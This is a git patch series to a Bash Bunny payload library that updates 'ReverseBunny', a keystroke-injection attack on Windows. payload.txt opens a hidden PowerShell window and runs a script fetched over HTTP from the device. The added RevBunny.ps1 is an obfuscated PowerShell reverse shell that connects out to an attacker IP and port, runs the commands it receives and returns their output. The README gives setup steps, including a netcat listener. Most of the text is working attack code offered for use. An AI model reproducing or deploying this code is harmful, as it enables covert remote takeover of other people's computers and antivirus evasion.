From cad78b52f29f9c4b0799f6a5d0cb2cd5b695b015 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:44:22 +0100 Subject: [PATCH 1/5] Update payload.txt --- .../remote_access/ReverseBunny/payload.txt | 53 +++++++++---------- 1 file changed, 25 insertions(+), 28 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 9cabc845..7c51d62c 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -1,47 +1,44 @@ #!/bin/bash # # Title: ReverseBunny -# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. +# Description: Get remote access, using an obfuscated powershell reverse shell. # Author: 0iphor13 -# Version: 1.3 +# Version: 1.5 # Category: Remote_Access -# Attackmodes: HID +# Attackmodes: HID, RNDIS_ETHERNET LED SETUP +ATTACKMODE RNDIS_ETHERNET HID -DUCKY_LANG de +GET SWITCH_POSITION +GET HOST_IP -ATTACKMODE HID +cd /root/udisk/payloads/$SWITCH_POSITION/ -#If needed, use this option -#WAIT_FOR_PRESENT Your_Device +# starting server +LED SPECIAL +# disallow outgoing dns requests so the server is accessible immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +#Opens hidden powershell instance Q DELAY 1500 Q GUI r Q DELAY 500 -Q STRING "powershell -NoP -NonI -W hidden" +Q STRING "powershell -NoP -NonI -w h" Q DELAY 500 Q ENTER -Q DELAY 250 -Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I" -Q DELAY 250 -Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH" -Q DELAY 250 -Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R" -Q DELAY 250 -Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ" -Q DELAY 250 -Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf" -Q DELAY 250 -Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN" -Q DELAY 250 -Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ" -Q DELAY 250 -Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp" -Q DELAY 250 -Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )" -Q DELAY 250 -Q ENTER +Q DELAY 500 +#Insert attacking IP +Q STRING "\$I='192.168.178.25';\$P=4444;" +Q DELAY 250 +Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")" +Q DELAY 400 +Q ENTER LED FINISH From 04b4f794b76e6aefe9d3fb43871a5804d4f41c35 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:44:56 +0100 Subject: [PATCH 2/5] Update payload.txt --- payloads/library/remote_access/ReverseBunny/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 7c51d62c..75d003cc 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -35,8 +35,8 @@ Q ENTER Q DELAY 500 -#Insert attacking IP -Q STRING "\$I='192.168.178.25';\$P=4444;" +#Insert attacking IP & Port below +Q STRING "\$I='0.0.0.0';\$P=4444;" Q DELAY 250 Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")" Q DELAY 400 From 2f1545eb35572ec2b5a492bee7304556f51a8af2 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:49:50 +0100 Subject: [PATCH 3/5] Update README.md --- .../remote_access/ReverseBunny/README.md | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 5cd530b3..6a1b7f98 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -1,17 +1,13 @@ -**Title: ReverseBunny** +**Title: ReverseBunny** -Author: 0iphor13 - -Version: 1.3 +

Author: 0iphor13
+OS: Windows
+Version: 1.5

Getting remote access via obfuscated reverse shell.
+Upload payload.txt and RevBunny.ps1 onto your Bunny +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )

-Whats new in version 1.3? -- Changed the whole payload -- Added custom shell design - -Coming soon: -- Custom commands -- New evasion technique +A pressed CAPSLOCK button as also an indicator light on the bunny will indicate the payloads successfull execution From ac2925419cf2ac5d1700f245b1c99377562530cb Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:50:47 +0100 Subject: [PATCH 4/5] added picture and RevBunny.ps1 --- .../remote_access/ReverseBunny/RevBunny.png | Bin 0 -> 10217 bytes .../remote_access/ReverseBunny/RevBunny.ps1 | 25 ++++++++++++++++++ 2 files changed, 25 insertions(+) create mode 100644 payloads/library/remote_access/ReverseBunny/RevBunny.png create mode 100644 payloads/library/remote_access/ReverseBunny/RevBunny.ps1 diff --git a/payloads/library/remote_access/ReverseBunny/RevBunny.png b/payloads/library/remote_access/ReverseBunny/RevBunny.png new file mode 100644 index 0000000000000000000000000000000000000000..f6f080d316f549ed3dab49bef1f3260d8861f42a GIT binary patch literal 10217 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 literal 0 HcmV?d00001 diff --git a/payloads/library/remote_access/ReverseBunny/RevBunny.ps1 b/payloads/library/remote_access/ReverseBunny/RevBunny.ps1 new file mode 100644 index 00000000..0c78dcd8 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/RevBunny.ps1 @@ -0,0 +1,25 @@ + .("{1}{0}" -f't','SE') ("mAI"+"h") ([tYpE]("{1}{0}"-F'Y','ArrA')) ; &("{0}{3}{1}{2}"-f 'se','r','IABLe','t-vA') eU92 ([TYPE]("{0}{1}" -F'sT','RiNG') );.("{0}{1}"-f 'S','et') (("{1}{0}" -f 'W','f83')+'R'+'0') ( [cHaR[ ]]" ))63]rahc[]GNirTs[,'Pou'(ECalPEr.)'\',)88]rahc[+27]rahc[+97]rahc[((ECalPEr.)93]rahc[]GNirTs[,'4EC'(ECalPEr.)'|',)711]rahc[+86]rahc[+76]rahc[((ECalPEr.)43]rahc[]GNirTs[,)28]rahc[+001]rahc[+911]rahc[((ECalPEr.)' + + +TIXE;)(ESolC.cPou;'+'})(hSUlF.sPou;)hTGnEL.yPou,0,yPou(etIrW.sPou;)xPou(sETyBtEG.)IICSA::]gnidocne.txet[(='+'yPou;Rdw >Rdw+)'+'noitacoL-te'+'G(+Rdw SP@yn'+'nuBRdw+zPou=xPou;)GNirTS-'+'tUouDC1&>2 dPou Xei(=zPou;)iPo'+'u,0,bPou(gnIRtSteG.)gnidocnEIICSA.tXeT.MeTsYs EmaNepYT'+'- TCejBO-wEN(=dPou;{)0 en-)'+')hTgNeL.bP'+'ou,0,bPou(daER.sPou=iPou((eLIhw;}0{%uDC53556..0=bPou]][etyb[;)htgneL'+'.trA'+'ynnuBveRPou,0,trAynnuBveRPou(etirw.sPou;)(mAerTSteG.cPou=sPou;)PPou,IPou(tnE'+'IlCPCT.stEKcOS.tEN.mEtsYS tCEjBo-wEn=c'+'Pou +)4EC}KCOLSPAC{4EC(syeKdneS.hswPo'+'u +;)ynnubPou(setyBteG.IICSA::]gnidocnE'+'.txeT[ = trAynnuBveRPou +llehS.tpircSW tcejbOmoC- tcejbO-we'+'N = hswPou +;@Rdw + +...eunitnoc ot ]ret'+'nE[ sserP + +/___uDC 31rohpi0 yB '+' +uDC /__ '+' '+' +uDC ,__XHOuDC_u'+'DC uDC_'+'uDC_uDC uDC_uDC_,__XHO /____XHO___XHO/___uDC uDC_uDC___'+'XHO /_XHO uDC___XHO_'+'XHO uDC_XHO +uDC uDC_uDC uDC uDC uDC uDC uD'+'C uDC uDC uDC_uDC'+' uDC /_uDC uDC'+'__ uDC __XHO uDC uDC__ uDC V XHO/__ uDC XHOuDC uDC +uDC u'+'DC uDC uDCXHO _4EC uDCXHO _4E'+'C uDC uDC uDC '+'uDC ___ uDC _ /uDC_'+'_ /__4EC uDC _ / / XHO XHO _ // uDC + _ _ __ _ __ _ _ _/ /_uDC '+'uDC___ ___ __ _ _____ '+'_____/ /_uDC uDC + XHO ___ uDC '+' '+' XHO'+' _'+'__ uDC'+' + ______'+' '+' ______ +)Rdw(_)Rdw( + )=4EC.4EC=( + )/___XHO( + +Rdw@=ynnub'+'Pou'((xEI " ) ; ( .("{1}{2}{0}" -f '-ITEM','G','Et') ('VAR'+'IABLe:'+'M'+'aiH')).vaLue::("{1}{0}"-f'se','reVer').Invoke(( &('Gi') (("{3}{2}{1}{0}" -f ':f','ABLE','RI','VA')+'83w'+'R0'))."v`AlUe" ) ; (.("{0}{2}{1}"-f 'vA','E','RIaBl') eu92 -VaL)::("{0}{1}" -f'Joi','N').Invoke('' ,( &('Gi') (("{2}{1}{0}" -f':f','E','VARIABL')+'83w'+'R0'))."Val`Ue") |&("{1}{0}" -f 'EX','I') + From 1c166e2343b6feb085a592b0622315556e3be265 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 25 Jan 2023 11:52:58 +0100 Subject: [PATCH 5/5] Update README.md --- payloads/library/remote_access/ReverseBunny/README.md | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 6a1b7f98..d3b39a26 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -5,9 +5,11 @@ OS: Windows
Version: 1.5
-

Getting remote access via obfuscated reverse shell.
+

!Getting remote access via obfuscated reverse shell!
Upload payload.txt and RevBunny.ps1 onto your Bunny -![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) -Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )

-A pressed CAPSLOCK button as also an indicator light on the bunny will indicate the payloads successfull execution +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png) + +Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )

+ +A pressed CAPSLOCK key as also an indicator light on the bunny will indicate the payloads successfull execution